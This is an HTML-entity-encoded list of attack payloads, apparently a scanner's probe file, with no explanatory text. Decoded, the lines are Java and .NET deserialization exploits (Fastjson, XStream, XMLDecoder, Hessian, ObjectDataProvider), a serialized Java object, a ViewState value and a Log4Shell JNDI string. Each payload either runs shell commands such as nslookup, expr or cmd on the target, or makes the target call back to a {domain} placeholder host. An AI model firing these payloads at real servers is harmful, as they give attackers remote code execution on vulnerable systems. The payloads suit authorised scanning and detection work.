&#123;&#34;&#64;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#111;&#114;&#103;&#46;&#97;&#112;&#97;&#99;&#104;&#101;&#46;&#120;&#97;&#108;&#97;&#110;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#120;&#115;&#108;&#116;&#99;&#46;&#116;&#114;&#97;&#120;&#46;&#84;&#101;&#109;&#112;&#108;&#97;&#116;&#101;&#115;&#73;&#109;&#112;&#108;&#34;&#44;&#34;&#95;&#98;&#121;&#116;&#101;&#99;&#111;&#100;&#101;&#115;&#34;&#58;&#91;&#34;&#121;&#118;&#54;&#54;&#118;&#103;&#61;&#61;&#34;&#93;&#44;&#34;&#95;&#110;&#97;&#109;&#101;&#34;&#58;&#34;&#97;&#34;&#44;&#34;&#95;&#116;&#102;&#97;&#99;&#116;&#111;&#114;&#121;&#34;&#58;&#123;&#125;&#44;&#34;&#95;&#111;&#117;&#116;&#112;&#117;&#116;&#80;&#114;&#111;&#112;&#101;&#114;&#116;&#105;&#101;&#115;&#34;&#58;&#123;&#125;&#125;
&#123;&#34;&#64;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#106;&#97;&#118;&#97;&#46;&#110;&#101;&#116;&#46;&#73;&#110;&#101;&#116;&#65;&#100;&#100;&#114;&#101;&#115;&#115;&#34;&#44;&#34;&#118;&#97;&#108;&#34;&#58;&#34;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#34;&#125;
&#60;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#66;&#117;&#105;&#108;&#100;&#101;&#114;&#62;&#60;&#99;&#111;&#109;&#109;&#97;&#110;&#100;&#62;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#110;&#115;&#108;&#111;&#111;&#107;&#117;&#112;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#60;&#47;&#99;&#111;&#109;&#109;&#97;&#110;&#100;&#62;&#60;&#47;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#66;&#117;&#105;&#108;&#100;&#101;&#114;&#62;
&#60;&#106;&#97;&#118;&#97;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&#34;&#49;&#46;&#56;&#46;&#48;&#34;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#98;&#101;&#97;&#110;&#115;&#46;&#88;&#77;&#76;&#68;&#101;&#99;&#111;&#100;&#101;&#114;&#34;&#62;&#60;&#111;&#98;&#106;&#101;&#99;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#99;&#111;&#109;&#46;&#110;&#111;&#110;&#101;&#120;&#105;&#115;&#116;&#101;&#110;&#116;&#46;&#70;&#97;&#107;&#101;&#49;&#51;&#51;&#55;&#34;&#47;&#62;&#60;&#47;&#106;&#97;&#118;&#97;&#62;
&#60;&#106;&#97;&#118;&#97;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&#34;&#49;&#46;&#56;&#46;&#48;&#34;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#98;&#101;&#97;&#110;&#115;&#46;&#88;&#77;&#76;&#68;&#101;&#99;&#111;&#100;&#101;&#114;&#34;&#62;&#60;&#111;&#98;&#106;&#101;&#99;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#66;&#117;&#105;&#108;&#100;&#101;&#114;&#34;&#62;&#60;&#97;&#114;&#114;&#97;&#121;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#83;&#116;&#114;&#105;&#110;&#103;&#34;&#32;&#108;&#101;&#110;&#103;&#116;&#104;&#61;&#34;&#51;&#34;&#62;&#60;&#118;&#111;&#105;&#100;&#32;&#105;&#110;&#100;&#101;&#120;&#61;&#34;&#48;&#34;&#62;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#47;&#98;&#105;&#110;&#47;&#115;&#104;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#60;&#47;&#118;&#111;&#105;&#100;&#62;&#60;&#118;&#111;&#105;&#100;&#32;&#105;&#110;&#100;&#101;&#120;&#61;&#34;&#49;&#34;&#62;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#45;&#99;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#60;&#47;&#118;&#111;&#105;&#100;&#62;&#60;&#118;&#111;&#105;&#100;&#32;&#105;&#110;&#100;&#101;&#120;&#61;&#34;&#50;&#34;&#62;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#101;&#120;&#112;&#114;&#32;&#55;&#32;&#92;&#42;&#32;&#49;&#57;&#49;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#60;&#47;&#118;&#111;&#105;&#100;&#62;&#60;&#47;&#97;&#114;&#114;&#97;&#121;&#62;&#60;&#118;&#111;&#105;&#100;&#32;&#109;&#101;&#116;&#104;&#111;&#100;&#61;&#34;&#115;&#116;&#97;&#114;&#116;&#34;&#47;&#62;&#60;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#62;&#60;&#47;&#106;&#97;&#118;&#97;&#62;
&#60;&#106;&#97;&#118;&#97;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&#34;&#49;&#46;&#56;&#46;&#48;&#34;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#98;&#101;&#97;&#110;&#115;&#46;&#88;&#77;&#76;&#68;&#101;&#99;&#111;&#100;&#101;&#114;&#34;&#62;&#60;&#111;&#98;&#106;&#101;&#99;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#108;&#97;&#110;&#103;&#46;&#84;&#104;&#114;&#101;&#97;&#100;&#34;&#32;&#109;&#101;&#116;&#104;&#111;&#100;&#61;&#34;&#115;&#108;&#101;&#101;&#112;&#34;&#62;&#60;&#108;&#111;&#110;&#103;&#62;&#53;&#48;&#48;&#48;&#60;&#47;&#108;&#111;&#110;&#103;&#62;&#60;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#62;&#60;&#47;&#106;&#97;&#118;&#97;&#62;
&#60;&#106;&#97;&#118;&#97;&#32;&#118;&#101;&#114;&#115;&#105;&#111;&#110;&#61;&#34;&#49;&#46;&#56;&#46;&#48;&#34;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#98;&#101;&#97;&#110;&#115;&#46;&#88;&#77;&#76;&#68;&#101;&#99;&#111;&#100;&#101;&#114;&#34;&#62;&#60;&#111;&#98;&#106;&#101;&#99;&#116;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#34;&#106;&#97;&#118;&#97;&#46;&#110;&#101;&#116;&#46;&#85;&#82;&#76;&#34;&#62;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#120;&#109;&#108;&#100;&#101;&#99;&#111;&#100;&#101;&#114;&#60;&#47;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#60;&#118;&#111;&#105;&#100;&#32;&#109;&#101;&#116;&#104;&#111;&#100;&#61;&#34;&#111;&#112;&#101;&#110;&#83;&#116;&#114;&#101;&#97;&#109;&#34;&#47;&#62;&#60;&#47;&#111;&#98;&#106;&#101;&#99;&#116;&#62;&#60;&#47;&#106;&#97;&#118;&#97;&#62;
&#67;&#95;&#104;&#101;&#115;&#115;&#105;&#97;&#110;&#82;&#108;&#100;&#97;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#97;
&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#87;&#105;&#110;&#100;&#111;&#119;&#115;&#46;&#68;&#97;&#116;&#97;&#46;&#79;&#98;&#106;&#101;&#99;&#116;&#68;&#97;&#116;&#97;&#80;&#114;&#111;&#118;&#105;&#100;&#101;&#114;&#44;&#32;&#80;&#114;&#101;&#115;&#101;&#110;&#116;&#97;&#116;&#105;&#111;&#110;&#70;&#114;&#97;&#109;&#101;&#119;&#111;&#114;&#107;&#34;&#44;&#34;&#77;&#101;&#116;&#104;&#111;&#100;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#83;&#116;&#97;&#114;&#116;&#34;&#44;&#34;&#79;&#98;&#106;&#101;&#99;&#116;&#73;&#110;&#115;&#116;&#97;&#110;&#99;&#101;&#34;&#58;&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#68;&#105;&#97;&#103;&#110;&#111;&#115;&#116;&#105;&#99;&#115;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#44;&#32;&#83;&#121;&#115;&#116;&#101;&#109;&#34;&#44;&#34;&#83;&#116;&#97;&#114;&#116;&#73;&#110;&#102;&#111;&#34;&#58;&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#68;&#105;&#97;&#103;&#110;&#111;&#115;&#116;&#105;&#99;&#115;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#83;&#116;&#97;&#114;&#116;&#73;&#110;&#102;&#111;&#44;&#32;&#83;&#121;&#115;&#116;&#101;&#109;&#34;&#44;&#34;&#70;&#105;&#108;&#101;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#110;&#115;&#108;&#111;&#111;&#107;&#117;&#112;&#34;&#44;&#34;&#65;&#114;&#103;&#117;&#109;&#101;&#110;&#116;&#115;&#34;&#58;&#34;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#34;&#125;&#125;&#125;
&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#87;&#105;&#110;&#100;&#111;&#119;&#115;&#46;&#68;&#97;&#116;&#97;&#46;&#79;&#98;&#106;&#101;&#99;&#116;&#68;&#97;&#116;&#97;&#80;&#114;&#111;&#118;&#105;&#100;&#101;&#114;&#44;&#32;&#80;&#114;&#101;&#115;&#101;&#110;&#116;&#97;&#116;&#105;&#111;&#110;&#70;&#114;&#97;&#109;&#101;&#119;&#111;&#114;&#107;&#34;&#44;&#34;&#77;&#101;&#116;&#104;&#111;&#100;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#83;&#116;&#97;&#114;&#116;&#34;&#44;&#34;&#79;&#98;&#106;&#101;&#99;&#116;&#73;&#110;&#115;&#116;&#97;&#110;&#99;&#101;&#34;&#58;&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#68;&#105;&#97;&#103;&#110;&#111;&#115;&#116;&#105;&#99;&#115;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#44;&#32;&#83;&#121;&#115;&#116;&#101;&#109;&#34;&#44;&#34;&#83;&#116;&#97;&#114;&#116;&#73;&#110;&#102;&#111;&#34;&#58;&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#68;&#105;&#97;&#103;&#110;&#111;&#115;&#116;&#105;&#99;&#115;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#83;&#116;&#97;&#114;&#116;&#73;&#110;&#102;&#111;&#44;&#32;&#83;&#121;&#115;&#116;&#101;&#109;&#34;&#44;&#34;&#70;&#105;&#108;&#101;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#99;&#109;&#100;&#34;&#44;&#34;&#65;&#114;&#103;&#117;&#109;&#101;&#110;&#116;&#115;&#34;&#58;&#34;&#47;&#99;&#32;&#115;&#101;&#116;&#32;&#47;&#97;&#32;&#55;&#42;&#49;&#57;&#49;&#34;&#125;&#125;&#125;
&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#87;&#105;&#110;&#100;&#111;&#119;&#115;&#46;&#68;&#97;&#116;&#97;&#46;&#79;&#98;&#106;&#101;&#99;&#116;&#68;&#97;&#116;&#97;&#80;&#114;&#111;&#118;&#105;&#100;&#101;&#114;&#44;&#32;&#80;&#114;&#101;&#115;&#101;&#110;&#116;&#97;&#116;&#105;&#111;&#110;&#70;&#114;&#97;&#109;&#101;&#119;&#111;&#114;&#107;&#34;&#44;&#34;&#77;&#101;&#116;&#104;&#111;&#100;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#83;&#116;&#97;&#114;&#116;&#34;&#44;&#34;&#79;&#98;&#106;&#101;&#99;&#116;&#73;&#110;&#115;&#116;&#97;&#110;&#99;&#101;&#34;&#58;&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#68;&#105;&#97;&#103;&#110;&#111;&#115;&#116;&#105;&#99;&#115;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#44;&#32;&#83;&#121;&#115;&#116;&#101;&#109;&#34;&#44;&#34;&#83;&#116;&#97;&#114;&#116;&#73;&#110;&#102;&#111;&#34;&#58;&#123;&#34;&#36;&#116;&#121;&#112;&#101;&#34;&#58;&#34;&#83;&#121;&#115;&#116;&#101;&#109;&#46;&#68;&#105;&#97;&#103;&#110;&#111;&#115;&#116;&#105;&#99;&#115;&#46;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#83;&#116;&#97;&#114;&#116;&#73;&#110;&#102;&#111;&#44;&#32;&#83;&#121;&#115;&#116;&#101;&#109;&#34;&#44;&#34;&#70;&#105;&#108;&#101;&#78;&#97;&#109;&#101;&#34;&#58;&#34;&#99;&#109;&#100;&#34;&#44;&#34;&#65;&#114;&#103;&#117;&#109;&#101;&#110;&#116;&#115;&#34;&#58;&#34;&#47;&#99;&#32;&#116;&#105;&#109;&#101;&#111;&#117;&#116;&#32;&#53;&#34;&#125;&#125;&#125;
&#65;&#65;&#69;&#65;&#65;&#65;&#68;&#47;&#47;&#47;&#47;&#47;&#65;&#81;&#65;&#65;&#65;&#65;&#65;&#65;&#65;&#65;&#65;&#69;&#65;&#81;&#65;&#65;&#65;&#65;&#61;&#61;
&#95;&#95;&#86;&#73;&#69;&#87;&#83;&#84;&#65;&#84;&#69;&#61;&#47;&#119;&#69;&#80;&#68;&#119;&#85;&#75;&#76;&#84;&#69;&#121;&#77;&#122;&#81;&#49;&#78;&#106;&#99;&#52;&#79;&#81;&#61;&#61;
&#114;&#79;&#48;&#65;&#66;&#88;&#78;&#121;&#65;&#66;&#70;&#113;&#89;&#88;&#90;&#104;&#76;&#110;&#86;&#48;&#97;&#87;&#119;&#117;&#83;&#71;&#70;&#122;&#97;&#69;&#49;&#104;&#99;&#65;&#85;&#72;&#50;&#115;&#72;&#68;&#70;&#109;&#68;&#82;&#65;&#119;&#65;&#67;&#82;&#103;&#65;&#75;&#98;&#71;&#57;&#104;&#90;&#69;&#90;&#104;&#89;&#51;&#82;&#118;&#99;&#107;&#107;&#65;&#67;&#88;&#82;&#111;&#99;&#109;&#86;&#122;&#97;&#71;&#57;&#115;&#90;&#72;&#65;&#47;&#81;&#65;&#65;&#65;&#65;&#65;&#65;&#65;&#68;&#72;&#99;&#73;&#65;&#65;&#65;&#65;&#69;&#65;&#65;&#65;&#65;&#65;&#70;&#122;&#99;&#103;&#65;&#77;&#97;&#109;&#70;&#50;&#89;&#83;&#53;&#117;&#90;&#88;&#81;&#117;&#86;&#86;&#74;&#77;&#108;&#105;&#85;&#51;&#78;&#104;&#114;&#56;&#53;&#72;&#73;&#68;&#65;&#65;&#100;&#74;&#65;&#65;&#104;&#111;&#89;&#88;&#78;&#111;&#81;&#50;&#57;&#107;&#90;&#85;&#107;&#65;&#66;&#72;&#66;&#118;&#99;&#110;&#82;&#77;&#65;&#65;&#108;&#104;&#100;&#88;&#82;&#111;&#98;&#51;&#74;&#112;&#100;&#72;&#108;&#48;&#65;&#66;&#74;&#77;&#97;&#109;&#70;&#50;&#89;&#83;&#57;&#115;&#89;&#87;&#53;&#110;&#76;&#49;&#78;&#48;&#99;&#109;&#108;&#117;&#90;&#122;&#116;&#77;&#65;&#65;&#82;&#109;&#97;&#87;&#120;&#108;&#100;&#65;&#65;&#83;&#84;&#71;&#112;&#104;&#100;&#109;&#69;&#118;&#98;&#71;&#70;&#117;&#90;&#121;&#57;&#84;&#100;&#72;&#74;&#112;&#98;&#109;&#99;&#55;&#84;&#65;&#65;&#69;&#97;&#71;&#57;&#122;&#100;&#72;&#81;&#65;&#69;&#107;&#120;&#113;&#89;&#88;&#90;&#104;&#76;&#50;&#120;&#104;&#98;&#109;&#99;&#118;&#85;&#51;&#82;&#121;&#97;&#87;&#53;&#110;&#79;&#48;&#119;&#65;&#67;&#72;&#66;&#121;&#98;&#51;&#82;&#118;&#89;&#50;&#57;&#115;&#100;&#65;&#65;&#83;&#84;&#71;&#112;&#104;&#100;&#109;&#69;&#118;&#98;&#71;&#70;&#117;&#90;&#121;&#57;&#84;&#100;&#72;&#74;&#112;&#98;&#109;&#99;&#55;&#84;&#65;&#65;&#68;&#99;&#109;&#86;&#109;&#100;&#65;&#65;&#83;&#84;&#71;&#112;&#104;&#100;&#109;&#69;&#118;&#98;&#71;&#70;&#117;&#90;&#121;&#57;&#84;&#100;&#72;&#74;&#112;&#98;&#109;&#99;&#55;&#99;&#80;&#47;&#47;&#47;&#47;&#47;&#47;&#47;&#47;&#47;&#47;&#100;&#65;&#65;&#73;&#101;&#50;&#82;&#118;&#98;&#87;&#70;&#112;&#98;&#110;&#49;&#48;&#65;&#65;&#99;&#118;&#100;&#88;&#74;&#115;&#90;&#71;&#53;&#122;&#100;&#65;&#65;&#73;&#101;&#50;&#82;&#118;&#98;&#87;&#70;&#112;&#98;&#110;&#49;&#48;&#65;&#65;&#82;&#111;&#100;&#72;&#82;&#119;&#99;&#72;&#104;&#48;&#65;&#66;&#90;&#111;&#100;&#72;&#82;&#119;&#79;&#105;&#56;&#118;&#101;&#50;&#82;&#118;&#98;&#87;&#70;&#112;&#98;&#110;&#48;&#118;&#100;&#88;&#74;&#115;&#90;&#71;&#53;&#122;&#101;&#65;&#61;&#61;
&#36;&#123;&#106;&#110;&#100;&#105;&#58;&#108;&#100;&#97;&#112;&#58;&#47;&#47;&#123;&#100;&#111;&#109;&#97;&#105;&#110;&#125;&#47;&#97;&#125;
